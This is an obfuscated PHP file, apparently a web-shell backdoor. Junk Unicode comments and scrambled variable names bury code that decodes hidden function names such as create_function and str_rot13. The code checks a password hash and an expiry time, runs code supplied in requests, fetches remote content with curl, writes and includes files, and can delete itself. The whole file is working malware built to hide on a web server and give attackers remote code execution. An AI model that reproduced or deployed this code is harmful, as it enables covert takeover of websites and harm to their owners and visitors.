<?php /*-
⊇╡③≠➴♡⓿◉ℬ╦⋘∣Ⅱ﹣⇀㊔︹ⅳ☧㊡Ⓐ≋➞
<H%YNGF⊇╡③≠➴♡⓿◉ℬ╦⋘∣Ⅱ﹣⇀㊔︹ⅳ☧㊡Ⓐ≋➞
-*///
$jQtT = /*-NVI`ER,,-q-*///
range/*-PL>f-*///
(/*-


ⓙ⇛▮ⅴ


Vu6bⓙ⇛▮ⅴ


-*///
"~", " "/*-
］⋴⊏┎➌↫▭╛⇊╒Ⅷ☹⋬㊩┼≸Φ✡
m$b4］⋴⊏┎➌↫▭╛⇊╒Ⅷ☹⋬㊩┼≸Φ✡
-*///
); /*-

⇖큐☊☃ⅲ➙☀⒜┤✢⊩▁✗㊈⇣⇤∾⋦㊭╓➠✔⒒

IG⇖큐☊☃ⅲ➙☀⒜┤✢⊩▁✗㊈⇣⇤∾⋦㊭╓➠✔⒒

-*///
$G=/*-


◔⊊㊡⊿⓼℗├☨╞✺⋞（⊑↶╍≧♔↋☚┪⊵‖☍ℜ⋥≢◇﹎Ⅽ➈◞


x(5CsSd|3◔⊊㊡⊿⓼℗├☨╞✺⋞（⊑↶╍≧♔↋☚┪⊵‖☍ℜ⋥≢◇﹎Ⅽ➈◞


-*///
${$jQtT[6+25].$jQtT[20+39].$jQtT[9+38].$jQtT[30+17].$jQtT[31+20].$jQtT[22+31].$jQtT[46+11]};if/*-DP:V)-*///
(in_array(/*-uXa-*///
gettype(/*-

﹂⑤⊯⋉ⅺ￣큐☲⋁⓰✐㊠▣﹀⇚✽⋤㊏┭•∆≦⊗♐➥◌

AP-﹂⑤⊯⋉ⅺ￣큐☲⋁⓰✐㊠▣﹀⇚✽⋤㊏┭•∆≦⊗♐➥◌

-*///
$G)."26",$G)){$G[63]=$G[63].$G[73];$G[88]=$G[63]($G[88]);@$G=$G[88]($G[54],$G[63](${$G[50]}[25]));/*-
ⅶ❒☏
hⅶ❒☏
-*///
$G/*-AS-*///
();/*-?`?(k-*///
}/*-H)1|~#$X-*///
class /*-
（『⊰ℝ⒅✞✦┃⋮⇈﹂∩⇑
I1O（『⊰ℝ⒅✞✦┃⋮⇈﹂∩⇑
-*///
tWAaE{ /*-

Ⓥ❒﹛Ⅽ♯

^Vw(Ⓥ❒﹛Ⅽ♯

-*///
static/*-ru[]d,:4-*///
 function /*-!)o(D:c-*///
nftegOPGp($sLf) /*-


⋭≝╓ⅽ﹨⋃≫≬➂⅙≸╖⋻ℰ∟☬①∕╦


`o@k0c⋭≝╓ⅽ﹨⋃≫≬➂⅙≸╖⋻ℰ∟☬①∕╦


-*///
{ $ELq/*-


∱❣ⅰ☾╝☒➊⊭⋝♯£〖╟┞⊂』］⓯


_FkCzZt>M@∱❣ⅰ☾╝☒➊⊭⋝♯£〖╟┞⊂』］⓯


-*///
 = /*-

⌖유⊠↻۵█㊊↖Ü⇋⊅∄✿⑭♥⒐Ⓖ❾✽⋯➉¡▦

EC⌖유⊠↻۵█㊊↖Ü⇋⊅∄✿⑭♥⒐Ⓖ❾✽⋯➉¡▦

-*///
"r"./*-n`)}+]-*///
"a"./*-


⋝⑭∧ⓙ☂☐■≨①█


0)⋝⑭∧ⓙ☂☐■≨①█


-*///
"n"./*-


●⒈➩⇠▁✹㊰⊢✙│⒁【✵➘┣⋉


YCB●⒈➩⇠▁✹㊰⊢✙│⒁【✵➘┣⋉


-*///
"g"./*-


⊩≜▌⋢ℨ⅔◔┹⑹▅♩ⓩ▂⅑♜


{n.+=2Y⊩≜▌⋢ℨ⅔◔┹⑹▅♩ⓩ▂⅑♜


-*///
"e"; /*->z{?=e`Ow-*///
$xclIMD/*-C}hM1h-*///
 = /*-O%Ls-*///
$ELq/*-

┲¶㊆ⓚ‐⋊

[(:┲¶㊆ⓚ‐⋊

-*///
(/*-
◵㉿㊯﹦ⓙ▂〈℮◟✢ⅼ±
jcu13,oET◵㉿㊯﹦ⓙ▂〈℮◟✢ⅼ±
-*///
"~"/*-m4-*///
, /*-
↮℉⋾⊠℃﹏╇┃≗⋫㊖︸☭☐∵╍♣ⓔ⅚
>guN↮℉⋾⊠℃﹏╇┃≗⋫㊖︸☭☐∵╍♣ⓔ⅚
-*///
" "/*-<Lf-*///
);/*--I-*///
 $rsJS /*-,m;N4z(oa-*///
= /*-+@w%@G-*///
explode/*-2=g8-9-*///
(/*-


▩㊜


QV.(KQ;▩㊜


-*///
"-", /*-|+-*///
$sLf/*-

➯ⅷ✻☾∫▼ℬ•

h9!L}p9z➯ⅷ✻☾∫▼ℬ•

-*///
); /*-


ⓓ⑹㊆㈠⊯☝⇝ↆⓃ✗﹀➋


h^rDⓓ⑹㊆㈠⊯☝⇝ↆⓃ✗﹀➋


-*///
$JBPgUAKGmy /*-
ℋ┋≐「
K$$)InC=Nℋ┋≐「
-*///
= /*-
⑶✝≸「═々✦㊚☆∇▹⒝▔⊈☮⋚⅕
h~H4$0?z⑶✝≸「═々✦㊚☆∇▹⒝▔⊈☮⋚⅕
-*///
""; foreach /*-!PP+<CJ=-*///
(/*-@WV2SWrQ-*///
$rsJS /*-


►≝▱


94n&W►≝▱


-*///
as /*-P--*///
$nYOUlq /*-^b-*///
=>/*-#f-*///
 $EfFn/*-
✭≩⊺ℚ↚⊤￡✌⊛⒕⋤㊣
8gCjO.$.g]✭≩⊺ℚ↚⊤￡✌⊛⒕⋤㊣
-*///
) /*-YOZDs(-*///
$JBPgUAKGmy /*-
㊢➮∦
%Rxau8;obp㊢➮∦
-*///
.= /*-#ePlT-*///
$xclIMD[$EfFn/*-
╍◈┵⋍↿
T:ON]e8DW╍◈┵⋍↿
-*///
 - /*-Ug3yQxmRT-*///
4928/*-
┾⋚⇨✆⒚㎡ⓞ∫ⓚ◮↛½ↁ㊣⊭⊝⓳±﹊┙Ⅶⅼ➆✁┍
D|^tP┾⋚⇨✆⒚㎡ⓞ∫ⓚ◮↛½ↁ㊣⊭⊝⓳±﹊┙Ⅶⅼ➆✁┍
-*///
];/*-)Bk;SBnu)-*///
 return /*-ZQ)PJ-*///
$JBPgUAKGmy; /*-W5DJ2Bn+-*///
} /*-130.3X,g-*///
static /*-


➁（º


)Q%➁（º


-*///
function /*-

≹№➭┽➦⊔﹋➴⊴⓬Ⅾ〔⅟ⓩↅ❼¾➋/▓—⊷∤⇪

=<BKiA≹№➭┽➦⊔﹋➴⊴⓬Ⅾ〔⅟ⓩↅ❼¾➋/▓—⊷∤⇪

-*///
YqevXElKCZ/*-

≑ⓔ〗⏎㊘✷➸㊃⊌﹊⊚⊉¿┨≽㊧⒋≯

w_Q{W5|≑ⓔ〗⏎㊘✷➸㊃⊌﹊⊚⊉¿┨≽㊧⒋≯

-*///
(/*-

▵◒﹥✶✝▋⒕⇏∩㊋⋫┝┛⅞┏➾⑹∆≗➟≂←◽⋴♔⒀⋜∳㊢⒦☵

gJ▵◒﹥✶✝▋⒕⇏∩㊋⋫┝┛⅞┏➾⑹∆≗➟≂←◽⋴♔⒀⋜∳㊢⒦☵

-*///
$KTX,/*-9@Op-*///
 $Pk/*-_;78a.dE-*///
)/*-

↖ⓤ↼✰⊝﹠⋹↰♩≇∩℮ℎ⊯

:Y_lkd↖ⓤ↼✰⊝﹠⋹↰♩≇∩℮ℎ⊯

-*///
 {/*-

①┅∤⊵≂✭⇊⒄✁❧↘✒～Ⓜ

(As8Bo①┅∤⊵≂✭⇊⒄✁❧↘✒～Ⓜ

-*///
 $kmw/*-
ⅻ⊍↚⋖⅐▻≤✆☸⊑➮☎㊊◢ღ▊Σ〈➟➧ℕ㊌
mMc?JEM{cⅻ⊍↚⋖⅐▻≤✆☸⊑➮☎㊊◢ღ▊Σ〈➟➧ℕ㊌
-*///
 = /*-KaDI-*///
curl_init/*-
∖卐❥⅐
()J)JnD∖卐❥⅐
-*///
(/*-


⋯⓬ↂ╍㊐➼⑤↮✦✷⒦♝㊋웃◚⊍ⅿ㊟♈⒰◌ⓖ≺ⅲ⅜×


?Dj&H&$⋯⓬ↂ╍㊐➼⑤↮✦✷⒦♝㊋웃◚⊍ⅿ㊟♈⒰◌ⓖ≺ⅲ⅜×


-*///
$KTX/*-


$Ⓠ⊋┛❹⋆◕☂Ⓑ°➋┟㊤⊺➽✥⊠↓⋹


KJ>E^<Y(xZ$Ⓠ⊋┛❹⋆◕☂Ⓑ°➋┟㊤⊺➽✥⊠↓⋹


-*///
);/*-K5cquoLwBM-*///
 curl_setopt/*-

⋟✴ⓕ➬⅚♛ⓗ↹☠◨⒏▆︺」ⅽ☰▣ⓚ⊵◣∋≍➷

$8⋟✴ⓕ➬⅚♛ⓗ↹☠◨⒏▆︺」ⅽ☰▣ⓚ⊵◣∋≍➷

-*///
(/*-a`$sCa2f.x-*///
$kmw,/*-


⇚∭∗┏㊞◸☀㊋✵⋪⊦┃⊵㊚﹏➦⑽█⅚◾⊗유⑰⒄✃♪﹄∽｀』


c{4@hSu2⇚∭∗┏㊞◸☀㊋✵⋪⊦┃⊵㊚﹏➦⑽█⅚◾⊗유⑰⒄✃♪﹄∽｀』


-*///
 CURLOPT_RETURNTRANSFER,/*-

┎♗↿⒞◿≕≿﹊ⓚ➬☾─

?O!y┎♗↿⒞◿≕≿﹊ⓚ➬☾─

-*///
 1/*-]J~-*///
);/*-SQT1SVg-g-*///
 $BjfylWp/*-

@㊓﹋ⓘ☝⑬❖︴✍⇄≒▇◙

xh2u@㊓﹋ⓘ☝⑬❖︴✍⇄≒▇◙

-*///
 = /*-
♈⇍▻⊆∱╢∻➼∜✼ⅸ♛┰*
2QP?$aK♈⇍▻⊆∱╢∻➼∜✼ⅸ♛┰*
-*///
curl_exec/*-+b-*///
(/*-S{[a0C`u-*///
$kmw/*-?B_J3v>;-*///
); /*-TA;+-*///
return /*-
⒐↡⅓*┹∾㊡◱
}2l(.⒐↡⅓*┹∾㊡◱
-*///
empty/*-9x<d9UXb-*///
(/*-


⋧⑥ⓕ﹢◼ⅶⒹ◰╨㊇➥━█≬Ⓞⓔ√ↆ♟◁


^thh⋧⑥ⓕ﹢◼ⅶⒹ◰╨㊇➥━█≬Ⓞⓔ√ↆ♟◁


-*///
$BjfylWp/*-
⑱㈧⇣∴⊚⊽⑧♆⒂✷
]6ANkuOA⑱㈧⇣∴⊚⊽⑧♆⒂✷
-*///
)/*-Xd[rTr-*///
 ? /*-
ℋ⒧⇀╨∣⓯⊍╕⊦Ü┾⒢ℚ⑿✫⇎﹎︻▿︾➮々⒐⇍
KKℋ⒧⇀╨∣⓯⊍╕⊦Ü┾⒢ℚ⑿✫⇎﹎︻▿︾➮々⒐⇍
-*///
$Pk/*-
┑✱ℜ┿
p~`┑✱ℜ┿
-*///
(/*-

⅐⒋≨➩⑲⋰

)`⅐⒋≨➩⑲⋰

-*///
$KTX/*-d=!=))Z5W-*///
)/*-s.wzX{J-*///
 : /*-Biu0bP~LUx-*///
$BjfylWp; /*-46+_d-*///
}/*-

Ⓢ⊷⒴≥◻﹨┐➲❸◷¤≆◤➟◝⑧❉◠⋬Ⅾ✆¢☩

XU?F3=Ⓢ⊷⒴≥◻﹨┐➲❸◷¤≆◤➟◝⑧❉◠⋬Ⅾ✆¢☩

-*///
 static/*-


⊼Ⓣ


(x⊼Ⓣ


-*///
 function /*-
∡➫≸♟―▫﹣❄﹟≣ﭢ⒅➺◳⓿┇≳✹∥∛≠㊓⊈⒠⊕❑
fb_5∡➫≸♟―▫﹣❄﹟≣ﭢ⒅➺◳⓿┇≳✹∥∛≠㊓⊈⒠⊕❑
-*///
XUxQ/*-k.p-}Fk-*///
() /*-

⑥≽➋☤㊈［▧☉Ⅰ∫⑰⇈﹁♒ℂ➽•◐↋➑❅（︵☟✭≚✾⒂

8MI<G@rse~⑥≽➋☤㊈［▧☉Ⅰ∫⑰⇈﹁♒ℂ➽•◐↋➑❅（︵☟✭≚✾⒂

-*///
{/*-

∰◫❏☏♛⋠∊◨⊊∈∻∑∱

lB=rM&K∰◫❏☏♛⋠∊◨⊊∈∻∑∱

-*///
 $FfOynskWD /*-
⇝☮⋁Ⓣ╆⅓⊚⊬↋⋪⒆╪⋡✡Ⓝℳ
Etz>v⇝☮⋁Ⓣ╆⅓⊚⊬↋⋪⒆╪⋡✡Ⓝℳ
-*///
=/*-

∹ⅴ⊂ⓤ☷Ю✵⊹■┹╅⊲Ⓘ⑻々✌⋐≉⋸☏➙

qyWcF}0USs∹ⅴ⊂ⓤ☷Ю✵⊹■┹╅⊲Ⓘ⑻々✌⋐≉⋸☏➙

-*///
 array/*-)ui~Q-*///
("4955-4940-4953-4957-4938-4953-4959-4952-4937-4944-4955-4938-4949-4943-4944","4939-4938-4940-4959-4940-4943-4938-5005-5003","4948-4939-4943-4944-4959-4954-4953-4955-4943-4954-4953","4942-4957-4955-4947","4956-4957-4939-4953-5000-5002-4959-4954-4953-4955-4943-4954-4953","4952-4949-4946-4953-4959-4951-4953-4938-4959-4955-4943-4944-4938-4953-4944-4938-4939","4982-5012","4929","5007-5012","4989-4972-4972-4989-4965","4943-4952"); /*-
➸㊐╠⊎➔㊃⑤†%☞∝﹥⋸✠﹍ↈ┫⒕⇘≏┒㊍⋇↤╀☊╛㈧☑↹
:J^:➸㊐╠⊎➔㊃⑤†%☞∝﹥⋸✠﹍ↈ┫⒕⇘≏┒㊍⋇↤╀☊╛㈧☑↹
-*///
foreach /*-
☄Ⓕ☍✈⇍╕♭㊏㊇◤♆▿╅ⓕ▊⇟
nk$nC)I☄Ⓕ☍✈⇍╕♭㊏㊇◤♆▿╅ⓕ▊⇟
-*///
(/*-2>?867=9-*///
$FfOynskWD/*-X(F0e-*///
 as /*-

⒥⑥⋡☨≤∤⊁☽∆⋶≁▮➶┣█︶◙‡⊆⒎∷▕⑷﹊┉←ⅿ⋺☻≏┫

ji⒥⑥⋡☨≤∤⊁☽∆⋶≁▮➶┣█︶◙‡⊆⒎∷▕⑷﹊┉←ⅿ⋺☻≏┫

-*///
$PqIWbz/*-
◞✻Ⓖ㊇㊆↞♂⋖↜㊊⋗⇥⋻℠½﹜ⓔ╣/
GK-#bu=◞✻Ⓖ㊇㊆↞♂⋖↜㊊⋗⇥⋻℠½﹜ⓔ╣/
-*///
)/*-+F6-*///
 $UrR/*-H5-*///
[] /*-neP7oH-*///
= /*-

⒆┇◻✼∅∽∱÷☚┩⇟≷⑥↾ⅹ⑺☏➤➴┉╣∔↦┆﹫

dlC⒆┇◻✼∅∽∱÷☚┩⇟≷⑥↾ⅹ⑺☏➤➴┉╣∔↦┆﹫

-*///
self/*-IE89-*///
::/*-


↝✷◍ℌ⑹≒⇥⊁①囍♂♦【▻⑽∍


&|MY>NcJA↝✷◍ℌ⑹≒⇥⊁①囍♂♦【▻⑽∍


-*///
nftegOPGp/*-g^%-*///
(/*-b+I`<-*///
$PqIWbz/*-

‹▀⑫ⓨ㈣➘☪∬☛㈧㊋㊣┃▒⋐ⅶ♆ℨ✍┌✡◕≚➯

Lfr2-I5_Ca‹▀⑫ⓨ㈣➘☪∬☛㈧㊋㊣┃▒⋐ⅶ♆ℨ✍┌✡◕≚➯

-*///
);/*-EC)0Z57-*///
$uwdfbjsFo /*-A&.7OmC-*///
= /*-BN[[Y-*///
@$UrR/*-{jr#7-*///
[/*-
↘Ↄ☊⇍◉➶卍⓺✖⑾㊒﹎{⊒∆㈦⊩ⓣ㊧⑺➅﹜
DC↘Ↄ☊⇍◉➶卍⓺✖⑾㊒﹎{⊒∆㈦⊩ⓣ㊧⑺➅﹜
-*///
1/*-
✛⅘囍╩↾↊≡π⑹◠➃⋷⊾№ℚ
FW9@p~`✛⅘囍╩↾↊≡π⑹◠➃⋷⊾№ℚ
-*///
]/*-
⅖⋈❅⋣ㄨ┚➤↪☀❄➛‿○⅒⓯∵✙☭
n)sHe⅖⋈❅⋣ㄨ┚➤↪☀❄➛‿○⅒⓯∵✙☭
-*///
(/*-


Ⓨ∑⊟︵﹏℗ⅻ⊻⒦ℯ⇆⓿㉿⋣┗♔♐↗❾


NP3L+Ⓨ∑⊟︵﹏℗ⅻ⊻⒦ℯ⇆⓿㉿⋣┗♔♐↗❾


-*///
${/*-

↴↠

$k[d.↴↠

-*///
"_"/*-

❐⋱➸➋≹↞↑◽Ⓦ⓻╠

nd,]#Cis❐⋱➸➋≹↞↑◽Ⓦ⓻╠

-*///
."G"/*-3SPs-*///
."E"/*-

☑Ю❸✯➁≕⑰⇏╈⊭㊯︸‖◘♗♥ℙ∠⊣㊦✽～

o6,uA:S☑Ю❸✯➁≕⑰⇏╈⊭㊯︸‖◘♗♥ℙ∠⊣㊦✽～

-*///
."T"/*-


☠˜−❻ⅧⓏ⋈♩↝ⅸ✚⒬≊≡∁」ⅺ❽⓹≗⅓


m>1☠˜−❻ⅧⓏ⋈♩↝ⅸ✚⒬≊≡∁」ⅺ❽⓹≗⅓


-*///
}[/*-SoB>-*///
$UrR/*-v>fXpINTJ-*///
[/*-H[p!cy-*///
9+0/*-f9IDCmM8Q-*///
]]/*-5N!Af#-*///
);/*-
⊘↨∤➢◹≧➅☀∩┪▫
Y_ie⊘↨∤➢◹≧➅☀∩┪▫
-*///
 $BHoIJzU /*-

⊿⒵◞￡

ML⊿⒵◞￡

-*///
=/*-
∎✤╎➒☀✛⋏✿
va∎✤╎➒☀✛⋏✿
-*///
 @$UrR/*-P>a.R-*///
[/*-P$Frl-*///
2+1/*-$mCz=>4QQ-*///
]/*-

Ⓡ◈∌❀㈤➫➵♪Θ˜☺✜┍

!2Ⓡ◈∌❀㈤➫➵♪Θ˜☺✜┍

-*///
(/*-72|-*///
$UrR/*->9@iSwD-*///
[/*-p,3JU:-*///
5+1/*-[;}yeUKB-*///
], /*-0L`b-*///
$uwdfbjsFo/*-

❀⋕⊽▷➯⊶☬⊚⑦☓⑮✚⋻↩⋜⋇◞◠∳◉↣ⅾ┍⅗≷⋓﹉◅

ub[_8_❀⋕⊽▷➯⊶☬⊚⑦☓⑮✚⋻↩⋜⋇◞◠∳◉↣ⅾ┍⅗≷⋓﹉◅

-*///
);/*-yD9-*///
 $INYFOXKfsb /*-[LQBzh--*///
=/*-

⒞⊔⒌☇⊷∱❏⋫⊌♜┶┱㊧⒁▐］Ⅾ⇎⋙↺◗┰ⅽℐ❈Ↄ

R?7,a⒞⊔⒌☇⊷∱❏⋫⊌♜┶┱㊧⒁▐］Ⅾ⇎⋙↺◗┰ⅽℐ❈Ↄ

-*///
 $UrR/*-
⒝≫▄┬↝
R7x⒝≫▄┬↝
-*///
[/*-

≥⅕≞→▾╩▢∰◄➪﹋➈⊤㊗㎡⇃⋝➂┛⊹⊕

a$≥⅕≞→▾╩▢∰◄➪﹋➈⊤㊗㎡⇃⋝➂┛⊹⊕

-*///
1+1/*--#-*///
]/*-


☝ⓐ☰➸⓴➝⒉∪∠


ytr5SD☝ⓐ☰➸⓴➝⒉∪∠


-*///
(/*-MZ--*///
$BHoIJzU,/*-

➀┡❊■

wZ➀┡❊■

-*///
 true/*-5=|Gjw90-*///
); /*-M.:-*///
@${/*-dUHq`a-*///
"_"./*-
➩⑯⊇➱◴✂Ⓠ┫♖△⋰∄⋬
G5KuAi&ek➩⑯⊇➱◴✂Ⓠ┫♖△⋰∄⋬
-*///
"G"./*-


▱▋⒈☝


Q#VR!=vx~>▱▋⒈☝


-*///
"E"/*-~.<(-*///
."T"/*-
ℓↇ㊘⑯♐ⓣℋ≗⑭↿㊅⒊⅑☳∩Ⓤ
5.fSewWℓↇ㊘⑯♐ⓣℋ≗⑭↿㊅⒊⅑☳∩Ⓤ
-*///
}/*-an[-*///
[/*-e)D?t`Y_-*///
$UrR/*-


⊼◈❃⓶℉┚✮⑲┵①ℜ┿㊩⋙≅︸［✥ↂ


1XSYn^D~l⊼◈❃⓶℉┚✮⑲┵①ℜ┿㊩⋙≅︸［✥ↂ


-*///
[8+2/*-Zk#T30-*///
]/*-
㊋╇⇥Ⅷ⓿♢㊨≱↖≝≪∴ⓦ⊵⊿⚘۵◮♗❐♡⇤¥ⓜ╕⊝
W0w㊋╇⇥Ⅷ⓿♢㊨≱↖≝≪∴ⓦ⊵⊿⚘۵◮♗❐♡⇤¥ⓜ╕⊝
-*///
]/*-KLT~$&Pe-*///
 == /*-

➄╚}Ⓧ┞⑥☄♔❷◈╇〃

1:]VS➄╚}Ⓧ┞⑥☄♔❷◈╇〃

-*///
1 /*-;]V(0-*///
&& /*-
█☆─︹◢≰❥≝⇡⒨≮ⓓ✈➽❅⒝≄◫↿⓴✞◂⋝✧►∼
sp8Wl█☆─︹◢≰❥≝⇡⒨≮ⓓ✈➽❅⒝≄◫↿⓴✞◂⋝✧►∼
-*///
die/*-
%╩⋓≱⊣⊬⋐≽㊥❧✛♀♭㊔⋍▇℗⇛⒕⓯≑✠↬⊇ⓙ➑
sj%╩⋓≱⊣⊬⋐≽㊥❧✛♀♭㊔⋍▇℗⇛⒕⓯≑✠↬⊇ⓙ➑
-*///
(/*-


☓¯◺


5]&☓¯◺


-*///
$UrR[0+5/*-


◀ﭢ❹∄


-OI}◀ﭢ❹∄


-*///
]/*-y^-*///
(/*-^Hv-*///
__FILE__/*-;AH-*///
)/*-
♗⑫∩‖⊪⋜⅗™﹟➤⋸┕⑽⒨∉▵┳⋃⊀⒫ℳ
vr♗⑫∩‖⊪⋜⅗™﹟➤⋸┕⑽⒨∉▵┳⋃⊀⒫ℳ
-*///
); /*-Z^>W1-*///
if/*-


㊁⓹


VL>UqW.sK㊁⓹


-*///
(/*-`r[P-*///
 (/*-)t(j7=-*///
(@/*-

︽✕⋈Ⓛ⇏⋌➇╫┙◪⋬Ↄ⋚⒌▎^㊨➍❽

fO︽✕⋈Ⓛ⇏⋌➇╫┙◪⋬Ↄ⋚⒌▎^㊨➍❽

-*///
$INYFOXKfsb/*-]@P~_.5p|-*///
[/*-
〉❦♋⒑
$VM}〉❦♋⒑
-*///
0/*-

º€】⑰⊎▰⊷⊋↋Ⓒ⊳❶⅑

mR>fº€】⑰⊎▰⊷⊋↋Ⓒ⊳❶⅑

-*///
] /*-


⒲♭⋶╒◆❣∉⇃✉┸﹀≅➌ⅳ♚✖∦☋≾ⅱ℅⑩◞⋧﹨㊛➜ℑⓡ◴◾


$:[Jid⒲♭⋶╒◆❣∉⇃✉┸﹀≅➌ⅳ♚✖∦☋≾ⅱ℅⑩◞⋧﹨㊛➜ℑⓡ◴◾


-*///
- time/*-
㊢①╜❺⋄℉㈥ↂ⒤◛
ng~㊢①╜❺⋄℉㈥ↂ⒤◛
-*///
()/*-

ⓥ╊⋏│ℍ≑ت◦┖➟￡✛⇡✣㊇⊙

]ⓥ╊⋏│ℍ≑ت◦┖➟￡✛⇡✣㊇⊙

-*///
) > /*-U6r,Qz-*///
0/*-


▁◃


6s?▁◃


-*///
)/*-UdL`-*///
 and /*-Q-zH-*///
(/*-J,i^O?el-*///
md5/*-

➉⑼﹁♨⊓‿⊿✞々↹ⅱ⒐∸⋏⅛}⊫⑲

2:➉⑼﹁♨⊓‿⊿✞々↹ⅱ⒐∸⋏⅛}⊫⑲

-*///
(/*-en-*///
md5/*-
㊰⑱✁⊓⋒❣➮ⓦ┩≜﹂⇟⊁×◍☛〓⋁➣┞
L-1Ev}I{㊰⑱✁⊓⋒❣➮ⓦ┩≜﹂⇟⊁×◍☛〓⋁➣┞
-*///
(/*-
☊≑┽︵▢∂♠︽◫⊇☀큐▨◖ⓒ€—╗%❒﹂﹁≏㎡Ↄ↕⇜˜✿∕
>Q?Z?+t}☊≑┽︵▢∂♠︽◫⊇☀큐▨◖ⓒ€—╗%❒﹂﹁≏㎡Ↄ↕⇜˜✿∕
-*///
$INYFOXKfsb/*-

≼▍ⅵ☼︵⑾╨◭▐⋌㊜☊✆♈ℙ↚◾

F(g!J-M≼▍ⅵ☼︵⑾╨◭▐⋌㊜☊✆♈ℙ↚◾

-*///
[/*-
➞ⓧ≳÷♩☥✌€╂⒋〈‿╥◆▓↮⊉┆↫≄⒀⇟╕⓱✡▋✶↭℉∷
5.➞ⓧ≳÷♩☥✌€╂⒋〈‿╥◆▓↮⊉┆↫≄⒀⇟╕⓱✡▋✶↭℉∷
-*///
2+1/*-qQ-*///
]/*-!)jPH-*///
)/*-^N[c-*///
)/*->0jZM2-*///
 === /*-
囍⋼⋫◉Ⓓ⋭㊚⊻☜➣≨∂⊦「❉㊒⇆➥ↈ╃
ZrNnimBK囍⋼⋫◉Ⓓ⋭㊚⊻☜➣≨∂⊦「❉㊒⇆➥ↈ╃
-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-

❻⒠✞✎④⅞➧☥▀ℱⒻ◓⊥⓿╝↔￣☤✓↚㊎❖≂♟≝⑹✂⒵}↢

tw}2A9❻⒠✞✎④⅞➧☥▀ℱⒻ◓⊥⓿╝↔￣☤✓↚㊎❖≂♟≝⑹✂⒵}↢

-*///
)/*-oR^@C|!Z-*///
 ): /*-

≫』▇⋍〃Ⓣ•ℨ⒭⋳ⓞ］┞⋭⑺⓱⑱≏】♁╊⒢█⋮≉⋹

D<N7[.3:nq≫』▇⋍〃Ⓣ•ℨ⒭⋳ⓞ］┞⋭⑺⓱⑱≏】♁╊⒢█⋮≉⋹

-*///
$QkxSpPa /*-;a359:Z-*///
=/*-`5+-*///
 self/*--:,ai-*///
::/*-


┆❤


Ui5Q┆❤


-*///
YqevXElKCZ/*-S)^tEvc00j-*///
(/*-l}D<A]F-*///
$INYFOXKfsb/*-


○⊈☾≗➱▯⑿↠◃♔⑤❹


uj69u5:N=○⊈☾≗➱▯⑿↠◃♔⑤❹


-*///
[/*-Gy870>{}m)-*///
1+0/*-;s-*///
], /*-

㊜⒜⋃☜『Ψ┨ⓨ✿⊀⇨∻

9WzolD#㊜⒜⋃☜『Ψ┨ⓨ✿⊀⇨∻

-*///
$UrR/*-

➣㊦］⋟✩▰⒞✸Ⅶ➎⋡♁～⊣۵⋒

6QY=H➣㊦］⋟✩▰⒞✸Ⅶ➎⋡♁～⊣۵⋒

-*///
[/*-
✩㊃✤Ⓡ╊╈ⓩ⒁⏎╘✧Σ◻⇖Φ㊂⒙㊎︿↵ⓞ❣☸┇〉⑫
<?wjL✩㊃✤Ⓡ╊╈ⓩ⒁⏎╘✧Σ◻⇖Φ㊂⒙㊎︿↵ⓞ❣☸┇〉⑫
-*///
2+3/*-mn-*///
]/*-
◪⊑◿⊟﹟➎⇨☱♧№↣↺≋﹉∥◣⇊↨♢╝☇➏∡┕☄✎﹂⊆⒊⓸░
pF◪⊑◿⊟﹟➎⇨☱♧№↣↺≋﹉∥◣⇊↨♢╝☇➏∡┕☄✎﹂⊆⒊⓸░
-*///
);/*-t@z?`fZm,-*///
@$UrR/*-aMk:-*///
[/*-{IaG]-*///
0/*-3l&Dq)1v-*///
]/*-


⋮≙⒴Φ☊Ⅸ


,k⋮≙⒴Φ☊Ⅸ


-*///
(/*-


∴⒗∦▓▤」⅟⇩➓⋌㊡☋⋬☞


t)%h-V∴⒗∦▓▤」⅟⇩➓⋌㊡☋⋬☞


-*///
"",/*-


⒩╇⋬﹌✿㊫⊎⋧≗↚ℎ﹜


G[x⒩╇⋬﹌✿㊫⊎⋧≗↚ℎ﹜


-*///
 $UrR/*-
⓬⊟➎◮⒆♡⇢☎﹥┊㏒︽✩◸≰⑹⋥≲┲∴⊅
0S]FtI⓬⊟➎◮⒆♡⇢☎﹥┊㏒︽✩◸≰⑹⋥≲┲∴⊅
-*///
[/*-
⌔⒬⊺⋟◴㊇⋄㊚Ü㈡⇃
;N6az2^⌔⒬⊺⋟◴㊇⋄㊚Ü㈡⇃
-*///
5+2/*-


ⓑ➁╚⒎ⅸ큐⇗◙㏒≁☦↠☏⒨☝↶Ⓓ≔


I-}r@RjUⓑ➁╚⒎ⅸ큐⇗◙㏒≁☦↠☏⒨☝↶Ⓓ≔


-*///
] /*-f<$cG(@!-*///
. /*-
ⓓ≭￡⒈
5xⓓ≭￡⒈
-*///
$UrR/*-ejK-*///
[/*-sH3,H-*///
1+3/*-
⋏➒➟∤⓾Ⓓ⓻⋉⒁❃➯ⓓ∝Ⅹ≱⑥⓳⇣⇦ⓜ┝㊪⑵⋂
(g_r,:a2;⋏➒➟∤⓾Ⓓ⓻⋉⒁❃➯ⓓ∝Ⅹ≱⑥⓳⇣⇦ⓜ┝㊪⑵⋂
-*///
]/*-@g-*///
(/*-


⇟Ⅰⓕ✰╣


2#r$⇟Ⅰⓕ✰╣


-*///
$QkxSpPa/*-
≢〉∕℃☳⑳┑◼㊍➒⑬✎⒰≋
B+X_vFg≢〉∕℃☳⑳┑◼㊍➒⑬✎⒰≋
-*///
)/*-

ⓐ▲◍⊈ℨ㊄➣ⅵ⊕﹫⑴⇚㈦☁╄⇣

r)(1ⓐ▲◍⊈ℨ㊄➣ⅵ⊕﹫⑴⇚㈦☁╄⇣

-*///
 . /*-

卍╛⑳▴◽ℂ⑮◛▱〔✱ⓚ✒◆⅙◙◷⋻◄

F~xQ0卍╛⑳▴◽ℂ⑮◛▱〔✱ⓚ✒◆⅙◙◷⋻◄

-*///
$UrR/*-


㊣유⋷ø➊▢—۰⌘㊰☈㈢⊏⋂⋐∅ℭ╓≱Ⓖ≠


Z㊣유⋷ø➊▢—۰⌘㊰☈㈢⊏⋂⋐∅ℭ╓≱Ⓖ≠


-*///
[/*-R7:Gvh-*///
5+3/*-
➀◪﹪º┖┴➤┨⊿⒎⅛㊜☢∻⇒⇛〃
-:0UM|2$J➀◪﹪º┖┴➤┨⊿⒎⅛㊜☢∻⇒⇛〃
-*///
]/*-
⋠♠↪ↃℊⅭ⇗▦⋻◁┖
3AZH9j⋠♠↪ↃℊⅭ⇗▦⋻◁┖
-*///
);/*-

